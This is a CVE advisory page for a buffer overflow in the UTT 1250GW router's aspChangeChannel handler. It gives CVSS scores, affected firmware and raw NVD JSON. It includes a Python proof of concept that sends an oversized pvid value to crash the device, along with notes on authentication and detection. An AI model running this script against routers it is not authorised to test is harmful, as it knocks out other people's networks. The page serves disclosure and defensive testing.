Security Vulnerability Report
CVE-2025-11355 CVSS 8.8 HIGH

CVE-2025-11355

Published: 2025-10-07 07:15:44
Last Modified: 2026-01-08 16:02:03

Description

A vulnerability has been found in UTT 1250GW up to v2v3.2.2-200710. Affected by this vulnerability is the function strcpy of the file /goform/aspChangeChannel. The manipulation of the argument pvid leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:* - VULNERABLE
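cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry: the configuration is an AND of the firmware and hardware nodes, so the device is affected when it runs the firmware listed above)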
UTT 1250GW <= v2v3.2.2-200710

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
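#!/usr/bin/env python3
# CVE-2025-11355 - UTT 1250GW Buffer Overflow PoC
# Vulnerability: Buffer overflow in strcpy() at /goform/aspChangeChannel via pvid parameter
#
# Review notes:
#   * The request carries no session or credentials, while the advisory's
#     CVSS vector lists PR:L. A device that enforces login may reject the
#     request before the vulnerable handler runs, so a negative result from
#     this script does not show that the firmware is fixed.
#   * The outcome is inferred from the HTTP status or a transport error only.
#     Timeouts and connection errors also occur for hosts that are simply
#     unreachable, so confirm exposure from the installed firmware version
#     (advisory: affected up to and including 3.2.2-200710).
#   * Detection: on the wire and in proxy logs this traffic is a POST to
#     /goform/aspChangeChannel whose pvid field is unusually long.

import requests
import sys

TARGET_URL = "http://{}/goform/aspChangeChannel"
# Author's estimate of the destination buffer; informational only, the code
# below never reads it.
BUFFER_SIZE = 512  # Estimated buffer size for pvid parameter


def exploit(target_ip, payload_size=1024):
    """Send one oversized ``pvid`` value to aspChangeChannel and report the outcome.

    Args:
        target_ip: Host substituted into ``TARGET_URL``.
        payload_size: Number of filler characters placed in ``pvid``.

    Returns:
        True when the result suggests the web service failed while handling
        the request (HTTP 500, timeout, or connection error); False for any
        other response or for a request that could not be sent.
    """
    url = TARGET_URL.format(target_ip)

    # Fill the field with 'A' characters so it exceeds the handler's buffer.
    overflow_data = "A" * payload_size

    data = {"pvid": overflow_data}
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0",
    }

    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
    except requests.exceptions.Timeout:
        print("[+] Timeout detected - router may have crashed!")
        return True
    except requests.exceptions.ConnectionError:
        print("[+] Connection error - router may be down!")
        return True
    except requests.exceptions.RequestException as e:
        # Malformed target, redirect loops, etc.: the request never produced
        # a usable result, so nothing can be concluded.
        print(f"[!] Error: {e}")
        return False

    print(f"[*] Request sent to {url}")
    print(f"[*] Payload size: {payload_size} bytes")
    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response length: {len(response.content)}")

    status = response.status_code
    if status == 500:
        print("[+] Possible crash detected - vulnerability may be triggered")
        return True
    if status == 404:
        # A 404 means the web server answered and the endpoint is absent;
        # that is not evidence of a crash, so it is no longer counted as one.
        print("[-] Endpoint not found - target does not expose aspChangeChannel")
        return False
    if status in (401, 403):
        # Rejected before reaching the handler; see the PR:L note above.
        print("[-] Request rejected (authentication required) - result inconclusive")
        return False

    print("[-] No immediate crash detected")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [payload_size]")
        print(f"Example: {sys.argv[0]} 192.168.1.1 1024")
        sys.exit(1)

    target = sys.argv[1]

    # Reject a non-numeric or non-positive size with a usage error instead of
    # an unhandled ValueError traceback.
    try:
        size = int(sys.argv[2]) if len(sys.argv) > 2 else 1024
    except ValueError:
        print(f"[!] payload_size must be an integer, got {sys.argv[2]!r}")
        sys.exit(1)
    if size <= 0:
        print("[!] payload_size must be a positive integer")
        sys.exit(1)

    print("[*] CVE-2025-11355 PoC - UTT 1250GW Buffer Overflow")
    print(f"[*] Target: {target}")
    print(f"[*] Payload size: {size}")
    print("-" * 50)

    exploit(target, size)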

References

Raw JSON Data

{"cve": {"id": "CVE-2025-11355", "sourceIdentifier": "[email protected]", "published": "2025-10-07T07:15:44.260", "lastModified": "2026-01-08T16:02:03.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT 1250GW up to v2v3.2.2-200710. Affected by this vulnerability is the function strcpy of the file /goform/aspChangeChannel. The manipulation of the argument pvid leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.2-200710", "matchCriteriaId": "26129544-FEE2-4C29-8C44-4FDB97605BD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "00AFFB53-0AA8-42E1-8B2E-109D73D1B061"}]}]}], "references": [{"url": 
"https://github.com/cymiao1978/cve/blob/main/10.md", "source": "[email protected]", "tags": ["Broken Link", "Exploit"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/10.md#poc", "source": "[email protected]", "tags": ["Broken Link", "Exploit"]}, {"url": "https://vuldb.com/?ctiid.327240", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327240", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664921", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}